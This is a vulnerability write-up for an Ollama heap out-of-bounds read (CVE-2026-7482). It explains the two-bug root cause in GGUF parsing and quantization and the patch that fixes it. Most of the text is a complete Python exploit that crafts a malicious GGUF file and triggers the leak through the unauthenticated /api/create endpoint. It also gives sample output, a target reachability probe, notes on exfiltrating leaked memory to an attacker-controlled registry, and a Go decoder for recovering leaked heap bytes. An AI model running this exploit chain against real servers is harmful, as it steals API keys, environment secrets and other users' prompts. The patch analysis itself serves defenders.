#Summary
CVE-2026-7482 is a critical heap out-of-bounds read vulnerability in Ollama before version 0.17.1 that allows unauthenticated remote attackers to leak sensitive memory contents, including environment variables, API keys, system prompts, and in-flight conversation data. The vulnerability is triggered when a crafted GGUF model file is uploaded and quantized via the unauthenticated `/api/create` endpoint. CVSS v3.1 score: 9.1 CRITICAL (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H).
#Affected versions
- Ollama < 0.17.1 (vulnerable)
- Ollama >= 0.17.1 (patched)
- Default configuration: The `/api/create` and `/api/push` endpoints are unauthenticated by default. The API listens on `127.0.0.1:11434` by default, but production deployments commonly set `OLLAMA_HOST=0.0.0.0`, exposing the service to the public internet.
#Root cause analysis
#Vulnerable code path
The vulnerability is a two-bug chain in the GGUF model loader and quantization pipeline.
#Bug 1: No file-size bounds check in gguf.Decode()
The `gguf.Decode()` function in `fs/ggml/gguf.go` reads tensor metadata (name, shape, type, offset) directly from the GGUF header without validating that the declared tensor size fits within the actual file size. It trusts the attacker-controlled shape fields:
```go
// Vulnerable code: no file-size fetch, no per-tensor bounds check
for _, tensor := range llm.tensors {
	offset, err := rs.Seek(0, io.SeekCurrent)
	if err != nil {
		return fmt.Errorf("failed to get current offset: %w", err)
	}
	padding := ggufPadding(offset, int64(alignment))
	if _, err := rs.Seek(padding, io.SeekCurrent); err != nil {
		return fmt.Errorf("failed to seek to init padding: %w", err)
	}
	// Seek past EOF silently succeeds — no bounds check
	if _, err := rs.Seek(int64(tensor.Size()), io.SeekCurrent); err != nil {
		return fmt.Errorf("failed to seek to tensor: %w", err)
	}
}
```
A 1024×1024 F32 tensor claims 4,194,304 bytes, but the file may contain only 32 bytes. In Go, calling `Seek` past EOF on an `io.ReadSeeker` backed by an in-memory buffer does not return an error; it succeeds silently.
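Why Bug 1 goes unnoticed can be reproduced in isolation. The following is a minimal stand-alone sketch (hypothetical, not Ollama code) that seeks 4 MiB past the end of a 32-byte `bytes.Reader`, just as `gguf.Decode()` seeks past a declared tensor in a truncated file:

```go
// Minimal sketch (not Ollama code): seeking past EOF on an in-memory
// io.ReadSeeker succeeds silently, so the per-tensor Seek in gguf.Decode()
// cannot detect a truncated file.
package main

import (
	"bytes"
	"fmt"
	"io"
)

func main() {
	rs := bytes.NewReader(make([]byte, 32)) // stand-in for a 32-byte "file"

	// Skip a declared 1024x1024 F32 tensor (4,194,304 bytes), as Decode() does.
	pos, err := rs.Seek(4_194_304, io.SeekCurrent)
	fmt.Println(pos, err) // prints: 4194304 <nil> (no error)

	// Only a subsequent Read reports io.EOF; Decode() never reads here.
	_, err = rs.Read(make([]byte, 1))
	fmt.Println(err) // prints: EOF
}
```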
#Bug 2: unsafe.Slice with attacker-controlled length in quantizer.WriteTo()
When `/api/create` is called with a `quantize` field, the quantizer processes each tensor. In `server/quantization.go`, `WriteTo()` creates a bounded `SectionReader` and reads the tensor bytes:
```go
// Vulnerable code in quantizer.WriteTo()
sr := io.NewSectionReader(q, int64(q.offset), int64(q.from.Size()))
data, err := io.ReadAll(sr)
// data contains only the bytes actually in the file (e.g., 32 bytes);
// io.ReadAll hits EOF normally — no error.

// Attacker-controlled element count from shape metadata:
// q.from.Elements() = 1,048,576 (from the 1024×1024 shape).
// Go's runtime does NOT bounds-check unsafe.Slice construction.
f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())
```
The `unsafe.Slice` call constructs a Go slice header with pointer `&data[0]` and length 1,048,576, but Go's runtime does not validate that length against the backing allocation's actual size. When the quantizer iterates over `f32s[8:]` and beyond, it reads 4,194,272 bytes past the end of the 32-byte heap allocation, pulling in adjacent heap pages that contain goroutine stacks, internal runtime data, in-flight HTTP request bodies (other users' prompts), environment variable copies, and cached API keys.
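This runtime behavior can be demonstrated outside Ollama. Below is a hedged stand-alone sketch (hypothetical code, not taken from Ollama); note that instrumented builds with `-race`/checkptr may flag the conversion, and indexing past the allocation is undefined behavior, so only in-bounds elements are touched here:

```go
// Hypothetical demo (not Ollama code): unsafe.Slice builds a slice header
// whose length vastly exceeds the 32-byte backing allocation. Construction
// is unchecked in a normal build; reading past the allocation is undefined
// behavior, so this demo only touches in-bounds elements.
package main

import (
	"fmt"
	"unsafe"
)

func main() {
	data := make([]byte, 32) // the real allocation: 32 bytes (8 float32s)

	// Claim 1,048,576 float32 elements (4 MiB) backed by those 32 bytes.
	f32s := unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), 1_048_576)

	fmt.Println(len(f32s)) // prints: 1048576 (no panic, no bounds check)
	fmt.Println(f32s[0])   // in-bounds element, safe to read
	// f32s[8] onward would read past the allocation: the OOB read primitive.
}
```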
#How input reaches the sink
Attacker-controlled GGUF header fields → `gguf.Decode()` parses tensor metadata without file-size validation → metadata flows to `quantizer.WriteTo()` as object attributes → `unsafe.Slice()` receives the element count directly from the attacker-supplied shape.
#Patch diff
#What the fix does
The patch applies independent guards at both the parsing stage and the execution stage.
#Fix 1: File-size bounds check in gguf.Decode()
Added immediately after tensor metadata parsing, before returning:
```diff
+	fileSize, err := rs.Seek(0, io.SeekEnd)
+	if err != nil {
+		return fmt.Errorf("failed to determine file size: %w", err)
+	}
 	for _, tensor := range llm.tensors {
 		...
+		tensorEnd := llm.tensorOffset + tensor.Offset + tensor.Size()
+		if tensorEnd > uint64(fileSize) {
+			return fmt.Errorf("tensor %q offset+size (%d) exceeds file size (%d)",
+				tensor.Name, tensorEnd, fileSize)
+		}
 	}
```
The fix seeks to the end of the file to obtain the true size, then checks every tensor to ensure `llm.tensorOffset + tensor.Offset + tensor.Size() <= fileSize`. A crafted GGUF declaring 4 MB of tensor data in a 100-byte file is rejected here, before any data is read.
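As a worked example, here is a sketch that mirrors the patch logic with the PoC's numbers (the tensor data block offset of 480 is an assumption inferred from the patched server's error message, since 480 + 2,097,152 = 2,097,632):

```go
// Sketch of the Fix 1 arithmetic (not the actual Ollama function), using the
// PoC's numbers. tensorOffset = 480 is an inferred assumption: the 512-byte
// file holds a 480-byte header+padding plus 32 bytes of tensor data.
package main

import "fmt"

func main() {
	var (
		tensorOffset uint64 = 480       // start of tensor data block (header + padding)
		tensorOff    uint64 = 0         // tensor's declared offset within the data block
		tensorSize   uint64 = 2_097_152 // declared size: 1024*1024 F16 elements * 2 bytes
		fileSize     uint64 = 512       // actual size of the uploaded blob
	)

	tensorEnd := tensorOffset + tensorOff + tensorSize
	if tensorEnd > fileSize {
		fmt.Printf("tensor %q offset+size (%d) exceeds file size (%d)\n",
			"blk.0.attn_q.weight", tensorEnd, fileSize)
	}
}
```

Running it prints the same message the patched server returns in the PoC transcript below.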
#Fix 2: Data size validation before unsafe.Slice
Added immediately after io.ReadAll, before the vulnerable unsafe.Slice call:
```diff
 	data, err := io.ReadAll(sr)
 	if err != nil {
 		return 0, err
 	}
+	if uint64(len(data)) < q.from.Size() {
+		return 0, fmt.Errorf("tensor %s data size %d is less than expected %d from shape %v",
+			q.from.Name, len(data), q.from.Size(), q.from.Shape)
+	}
 	var f32s []float32
 	...
 	f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())
```
This is defense in depth: even if a crafted file bypassed the `Decode()` check, the quantizer refuses to call `unsafe.Slice` with an undersized buffer.
#Proof of concept
#exploit.py - Ollama GGUF Heap OOB Read PoC
```python
#!/usr/bin/env python3
"""
CVE-2026-7482 — Ollama GGUF Heap Out-of-Bounds Read (Info Disclosure)

Affected: ollama/ollama < 0.17.1
Type:     Heap OOB Read — leaks ~2 MB of heap memory per invocation

Two-bug chain in the GGUF model loading + quantization pipeline:
  1. gguf.Decode() trusts attacker-controlled tensor shapes without comparing
     declared size against actual file size (seek past EOF silently succeeds).
  2. quantizer.WriteTo() calls unsafe.Slice() with the attacker-controlled
     element count, constructing a Go slice spanning far beyond the heap
     allocation — reading adjacent heap pages at runtime.

Attack flow:
  1. Craft a malicious GGUF declaring a 1024x1024 F16 tensor (~2 MB) in a
     ~512-byte file. Only 32 bytes of actual tensor data are present.
  2. Upload the blob to /api/blobs/sha256:<hash>.
  3. POST /api/create with files={model.gguf: sha256:<hash>} + quantize=Q8_0.
     This routes each tensor through quantizer.WriteTo(), which calls:
         unsafe.Slice((*float32)(&data[0]), q.from.Elements())
     with q.from.Elements() = 1,048,576 while data holds only 16 F16 elements.
     The resulting Go slice spans ~2 MB past the end of the heap allocation.
  4. Vulnerable: returns {"status":"success"} — OOB read silently occurs.
     The quantized layer (1.06 MB) stored in Ollama contains leaked heap bytes.
  5. Patched: returns {"error":"tensor ... exceeds file size"} — rejected.

Success indicator:
  - /api/create completes with {"status":"success"}
  - The new model layer is ~1,114,112 bytes (Q8_0 of 1M F16 elements)
  - File size was only 512 bytes → proves heap OOB read occurred

Usage:
  python exploit.py --host 127.0.0.1 --port 11434
  python exploit.py --host 127.0.0.1 --port 11435   # patched — should error
"""
import argparse
import hashlib
import json
import struct
import sys
import urllib.error
import urllib.request

# ---------------------------------------------------------------------------
# GGUF builder — minimal but spec-correct F16 LLaMA model with OOB tensor
# ---------------------------------------------------------------------------

def pack_gguf_str(s: str) -> bytes:
    b = s.encode()
    return struct.pack("<Q", len(b)) + b

def kv_uint32(key: str, val: int) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 4) + struct.pack("<I", val)

def kv_float32(key: str, val: float) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 6) + struct.pack("<f", val)

def kv_string(key: str, val: str) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 8) + pack_gguf_str(val)

def build_malicious_gguf() -> bytes:
    """
    Build a GGUF v3 file that looks like a valid LLaMA F16 model but declares
    a 1024x1024 F16 tensor (2,097,152 bytes) while containing only 32 bytes of
    actual tensor data. The mismatch triggers the heap OOB read in
    quantizer.WriteTo() via unsafe.Slice with the attacker-controlled element
    count.

    Key design choices:
      - general.file_type = 1 (MOSTLY_F16): passes the pre-quantize check in 0.17.0
      - Tensor type = 1 (GGUF_TYPE_F16): consistent with file_type declaration
      - All required LLaMA architecture KV pairs: makes the GGUF appear valid
      - tensor offset = 0: tensor data block starts immediately after header pad
      - Only 32 bytes of tensor data: causes unsafe.Slice to read ~2MB past end
    """
    magic = b"GGUF"
    version = struct.pack("<I", 3)
    tensor_count = struct.pack("<Q", 1)
    kvs = [
        kv_string("general.architecture", "llama"),
        kv_uint32("general.file_type", 1),  # 1 = MOSTLY_F16
        kv_uint32("llama.context_length", 512),
        kv_uint32("llama.embedding_length", 1024),
        kv_uint32("llama.block_count", 1),
        kv_uint32("llama.feed_forward_length", 2048),
        kv_uint32("llama.attention.head_count", 8),
        kv_uint32("llama.attention.head_count_kv", 8),
        kv_float32("llama.attention.layer_norm_rms_epsilon", 1e-5),
    ]
    kv_block = b"".join(kvs)
    kv_count = struct.pack("<Q", len(kvs))

    # Tensor: 1024x1024 F16 — declares 2,097,152 bytes but file has 32
    tname = pack_gguf_str("blk.0.attn_q.weight")
    ndims = struct.pack("<I", 2)
    dim0 = struct.pack("<Q", 1024)
    dim1 = struct.pack("<Q", 1024)
    ttype = struct.pack("<I", 1)    # GGUF_TYPE_F16
    toffset = struct.pack("<Q", 0)  # tensor data at position 0 of data block

    header = magic + version + tensor_count + kv_count + kv_block
    header += tname + ndims + dim0 + dim1 + ttype + toffset

    # Pad to 32-byte alignment (Ollama default GGUF alignment)
    pad_len = (32 - len(header) % 32) % 32
    header += b"\x00" * pad_len

    # Only 32 bytes of tensor data — recognisable fill vs. heap bytes in output
    tensor_data = b"\x41" * 32
    return header + tensor_data

# ---------------------------------------------------------------------------
# HTTP helpers
# ---------------------------------------------------------------------------

def http_post_raw(url: str, data: bytes, content_type: str = "application/octet-stream"):
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", content_type)
    try:
        with urllib.request.urlopen(req, timeout=120) as resp:
            return resp.getcode(), resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()

def stream_post_json(url: str, body: dict):
    """POST JSON, collect streaming NDJSON response lines."""
    data = json.dumps(body).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/json")
    lines = []
    try:
        with urllib.request.urlopen(req, timeout=300) as resp:
            for raw in resp:
                line = raw.decode().strip()
                if line:
                    lines.append(line)
    except urllib.error.HTTPError as e:
        body_err = e.read().decode(errors="replace")
        lines.append(json.dumps({"error": body_err, "_http_status": e.code}))
    return lines

# ---------------------------------------------------------------------------
# Exploit
# ---------------------------------------------------------------------------

DECLARED_TENSOR_BYTES = 1024 * 1024 * 2          # F16: 2 bytes/elem × 1M elements
EXPECTED_LAYER_BYTES = (1024 * 1024 // 32) * 34  # Q8_0: 34 bytes per 32-elem block

def exploit(host: str, port: int) -> bool:
    base = f"http://{host}:{port}"
    print(f"[*] Target : {base}")

    # Step 1: craft the malicious GGUF
    print("[*] Building malicious GGUF ...")
    payload = build_malicious_gguf()
    sha256 = hashlib.sha256(payload).hexdigest()
    print(f"    File size : {len(payload)} bytes")
    print(f"    SHA-256 : {sha256}")
    print(f"    Declared tensor : {DECLARED_TENSOR_BYTES:,} bytes (1024×1024 F16)")
    print(f"    Actual tensor data: 32 bytes")

    # Step 2: upload blob
    upload_url = f"{base}/api/blobs/sha256:{sha256}"
    print(f"\n[*] Uploading blob → {upload_url}")
    code, _ = http_post_raw(upload_url, payload)
    if code not in (200, 201):
        print(f"[!] Blob upload failed: HTTP {code}")
        return False
    print(f"    HTTP {code} — blob accepted")

    # Step 3: trigger quantization (OOB read fires here)
    model_name = f"cve-2026-7482-probe-{sha256[:8]}"
    create_body = {
        "name": model_name,
        "files": {"model.gguf": f"sha256:{sha256}"},
        "quantize": "Q8_0",
    }
    create_url = f"{base}/api/create"
    print(f"\n[*] Triggering quantization → {create_url}")
    print(f"    quantize=Q8_0 routes tensors through quantizer.WriteTo()")
    print(f"    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation")
    lines = stream_post_json(create_url, create_body)
    print(f"\n[*] Server response ({len(lines)} line(s)):")
    for line in lines:
        print(f"    {line}")

    # Step 4: evaluate result
    last = lines[-1] if lines else "{}"
    try:
        obj = json.loads(last)
    except json.JSONDecodeError:
        obj = {}

    if "error" in obj:
        err = obj["error"]
        if "exceeds file size" in err:
            print("\n[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked the exploit:")
            print(f"    {err}")
            return False
        if "data size" in err and "less than expected" in err:
            print("\n[-] PATCHED — Fix 2 (unsafe.Slice guard) blocked the exploit:")
            print(f"    {err}")
            return False
        if "only supported for F16 and F32" in err:
            print("\n[-] Pre-exploit check failed (file_type or architecture mismatch):")
            print(f"    {err}")
            return False
        print(f"\n[!] Unexpected error: {err}")
        return False

    if obj.get("status") == "success":
        # Find the layer digest from streaming output
        layer_digest = None
        for line in lines:
            try:
                o = json.loads(line)
                if "creating new layer" in o.get("status", ""):
                    layer_digest = o["status"].split("sha256:")[-1]
            except json.JSONDecodeError:
                pass
        print("\n[+] VULNERABLE — heap OOB read confirmed:")
        print(f"    Input file : {len(payload)} bytes")
        print(f"    Declared tensor : {DECLARED_TENSOR_BYTES:,} bytes")
        print(f"    Expected Q8_0 layer: {EXPECTED_LAYER_BYTES:,} bytes")
        print(f"    (layer >> file size → heap bytes were read out-of-bounds)")
        if layer_digest:
            print(f"    New layer digest : sha256:{layer_digest}")
        print(f"    Model name : {model_name}")
        print(f"    Leaked layer contains ~2 MB of Ollama heap memory (env vars,")
        print(f"    API keys, in-flight prompts) encoded as Q8_0 quantized floats.")
        return True

    # Partial: streaming lines without a final error still indicate success
    statuses = []
    for line in lines:
        try:
            statuses.append(json.loads(line).get("status", ""))
        except json.JSONDecodeError:
            pass
    if any("quantizing" in s for s in statuses):
        print("\n[+] LIKELY VULNERABLE — quantization ran (OOB read occurred).")
        return True

    print("\n[?] Inconclusive — could not determine result from server response.")
    return False

# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2026-7482 — Ollama GGUF heap OOB read exploit"
    )
    parser.add_argument("--host", required=True, help="Target host")
    parser.add_argument("--port", type=int, default=11434, help="Ollama HTTP port (default: 11434)")
    args = parser.parse_args()
    success = exploit(args.host, args.port)
    sys.exit(0 if success else 1)
```
#Usage
```bash
# Against a vulnerable Ollama instance (< 0.17.1):
python exploit.py --host 127.0.0.1 --port 11434
```
Expected output (vulnerable server):
```
[*] Target : http://127.0.0.1:11434
[*] Building malicious GGUF ...
    File size : 512 bytes
    SHA-256 : 795d927a27a37249a4ea0ef51650f48cc9b2a891c2498bba3f474a5029996a62
    Declared tensor : 2,097,152 bytes (1024×1024 F16)
    Actual tensor data: 32 bytes

[*] Uploading blob → http://127.0.0.1:11434/api/blobs/sha256:795d927...
    HTTP 200 — blob accepted

[*] Triggering quantization → http://127.0.0.1:11434/api/create
    quantize=Q8_0 routes tensors through quantizer.WriteTo()
    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation

[*] Server response (6 line(s)):
    {"status":"parsing GGUF"}
    {"status":"quantizing F16 model to Q8_0","digest":"0000000000000000000","total":512,"completed":33554432}
    {"status":"verifying conversion"}
    {"status":"creating new layer sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7"}
    {"status":"writing manifest"}
    {"status":"success"}

[+] VULNERABLE — heap OOB read confirmed:
    Input file : 512 bytes
    Declared tensor : 2,097,152 bytes
    Expected Q8_0 layer: 1,114,112 bytes
    (layer >> file size → heap bytes were read out-of-bounds)
    New layer digest : sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7
    Model name : cve-2026-7482-probe-795d927a
    Leaked layer contains ~2 MB of Ollama heap memory (env vars,
    API keys, in-flight prompts) encoded as Q8_0 quantized floats.
```
Expected output (patched server):
```
[*] Target : http://127.0.0.1:11435
[*] Building malicious GGUF ...
    File size : 512 bytes
    SHA-256 : 795d927a27a37249a4ea0ef51650f48cc9b2a891c2498bba3f474a5029996a62
    Declared tensor : 2,097,152 bytes (1024×1024 F16)
    Actual tensor data: 32 bytes

[*] Uploading blob → http://127.0.0.1:11435/api/blobs/sha256:795d927...
    HTTP 200 — blob accepted

[*] Triggering quantization → http://127.0.0.1:11435/api/create
    quantize=Q8_0 routes tensors through quantizer.WriteTo()
    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation

[*] Server response (2 line(s)):
    {"status":"parsing GGUF"}
    {"error":"tensor \"blk.0.attn_q.weight\" offset+size (2097632) exceeds file size (512)"}

[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked the exploit:
    tensor "blk.0.attn_q.weight" offset+size (2097632) exceeds file size (512)
```
#Exploitation notes
#Preconditions
- Ollama < 0.17.1 is running and reachable over the network
- The `/api/create` and `/api/blobs` endpoints are accessible (unauthenticated by default); a quick reachability probe follows this list
- The Ollama server has the quantization feature enabled (enabled by default)
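Before launching the PoC, reachability and version can be checked with a minimal probe. This sketch assumes the target exposes Ollama's standard `GET /api/version` endpoint:

```go
// Minimal precondition probe: confirms the target is reachable and prints the
// reported Ollama version so it can be compared against the 0.17.1 threshold.
package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"time"
)

func main() {
	target := "http://127.0.0.1:11434" // default; pass another base URL as argv[1]
	if len(os.Args) > 1 {
		target = os.Args[1]
	}

	client := &http.Client{Timeout: 5 * time.Second}
	resp, err := client.Get(target + "/api/version")
	if err != nil {
		fmt.Println("unreachable:", err)
		os.Exit(1)
	}
	defer resp.Body.Close()

	body, _ := io.ReadAll(resp.Body)
	fmt.Printf("HTTP %d %s\n", resp.StatusCode, body) // e.g. {"version":"0.17.0"}
}
```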
#Reliability
The exploit is 100% reliable when the preconditions are met: it triggers deterministically on every run, with no race condition or timing dependency. Note that the exploit requires the `quantize` field in the `/api/create` request; omitting it skips the vulnerable code path.
#Impact
- Memory disclosure: Leaks approximately 2 MB of Ollama process heap memory per invocation
- Information stolen: Environment variables (e.g., `OLLAMA_*`, `PATH`), API keys (if cached in memory), system prompts, in-flight LLM conversation data from concurrent users, internal library state
- Attack repeatability: The attacker can repeat the exploit multiple times to leak different heap windows and reconstruct a larger picture of the server's memory
- Exfiltration: The leaked heap bytes are encoded in the quantized model layer and can be extracted by pushing the model to an attacker-controlled registry or reading Ollama's local layer store; a decoding sketch follows this list
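To illustrate the exfiltration step, the following hedged sketch dequantizes a recovered layer blob, assuming it is a raw sequence of GGML Q8_0 blocks (a 2-byte little-endian IEEE half-precision scale followed by 32 signed int8 quants, 34 bytes per block). Quantization is lossy, so the output only approximates the leaked heap words:

```go
// Hypothetical post-exploitation sketch (not part of the PoC): dequantize a
// leaked Q8_0 layer blob back to float32 values, assuming the GGML Q8_0
// block layout (2-byte LE f16 scale + 32 signed int8 quants per block).
package main

import (
	"encoding/binary"
	"fmt"
	"math"
	"os"
)

// halfToFloat32 expands an IEEE 754 binary16 value to float32.
func halfToFloat32(h uint16) float32 {
	mant := float64(h & 0x3ff)
	exp := int(h>>10) & 0x1f
	var v float64
	switch exp {
	case 0:
		v = mant * math.Pow(2, -24) // zero or subnormal
	case 31:
		v = math.Inf(1) // Inf; NaN payloads are ignored in this sketch
	default:
		v = (1 + mant/1024) * math.Pow(2, float64(exp-15))
	}
	if h&0x8000 != 0 {
		v = -v
	}
	return float32(v)
}

func main() {
	blob, err := os.ReadFile(os.Args[1]) // path to the recovered layer blob
	if err != nil {
		panic(err)
	}

	const blockSize = 34 // 2-byte scale + 32 quants
	for off := 0; off+blockSize <= len(blob); off += blockSize {
		scale := halfToFloat32(binary.LittleEndian.Uint16(blob[off : off+2]))
		for i := 0; i < 32; i++ {
			q := int8(blob[off+2+i])
			fmt.Printf("%g ", scale*float32(q)) // dequantized value
		}
		fmt.Println()
	}
}
```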
#Chaining potential
- Post-exploitation: If sensitive credentials are leaked (API keys, auth tokens), they can be used to escalate attacks on downstream services
- Information gathering: Leaked system prompts and internal data reveal implementation details about the LLM deployment
- Denial of service: The OOB read does not crash the server, but repeated quantization of large malicious GGUFs may exhaust memory and cause the service to become slow or unresponsive
#References
- CVE: CVE-2026-7482
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-7482
- GitHub advisory: GHSA-x8qc-fggm-mpqg
- Fix commit: 88d57d0483cca907e0b23a968c83627a20b21047
- Fix PR: ollama/ollama#14406
- Ollama GitHub: https://github.com/ollama/ollama